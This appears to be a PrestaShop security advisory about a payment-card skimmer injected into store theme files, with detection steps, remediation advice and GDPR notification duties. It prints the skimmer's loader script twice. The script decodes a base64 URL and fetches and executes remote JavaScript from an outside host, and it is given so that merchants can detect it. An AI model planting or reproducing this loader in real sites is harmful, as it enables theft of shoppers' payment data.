We have recently identified a security threat affecting certain online stores in the PrestaShop ecosystem. A malicious script ("digital skimmer") has been detected and may have resulted in the theft of some of your customers' payment information.
What does this digital skimmer do?
This malware works by replacing the legitimate payment buttons on the order page with fraudulent buttons. When a customer clicks on one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their payment information.
The skimmer is simply loaded via a <script> tag, written directly in the _partials/head.tpl file of the store’s active theme. This means the attacker was able to modify a file in the store.
How do I check if my store is affected?
In the Front Office
You can check your front office code by inspecting a page on your site (right-click, then "inspect"). Look inside the <script> tag; if you find the following code, it means your store is impacted:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Note: The part aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz changes each time, but the structure of the code remains the same, and the atob() function is always used. Code may be present before or after (the skimmer tries to hide itself by being slightly different on each store).
On Your Server
To check your files:
- You can find the same script tag in a file on your server. Connect to your server via FTP then navigate through the theme folder, then the active theme folder > template folder > _partial >
head.tpl. On this file, right-click then "view/edit", and look for the same tag:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
2. Also in your files, if you find the "mloader" or "simplefilemanager" module under the "/modules/" folder, this also means your store is impacted.
What should I do if my store is affected?
- Change the passwords for your various accesses (back office, database, FTP, SSH, and don’t forget to update the database access in the PrestaShop config file).
- Check your logs to see if any of your customers' data has been exfiltrated. If so, you will need to file a complaint with law enforcement and contact the CNIL.
- Consult an IT security professional to have your entire site checked. Only a professional can guarantee the security of your store.
Do I need to notify my customers?
As data controllers under the GDPR, it is your responsibility to assess whether a data breach has occurred and, if so, to carry out the required notifications. In accordance with Articles 33 and 34 of the GDPR, any breach likely to result in a risk to rights and freedoms must be reported to the CNIL within 72 hours, and to the affected individuals in case of high risk (a practical guide is available on the CNIL website).
⚠️ At this stage, we strongly recommend you perform a complete security check of your PrestaShop stores and ensure that none of them have been compromised.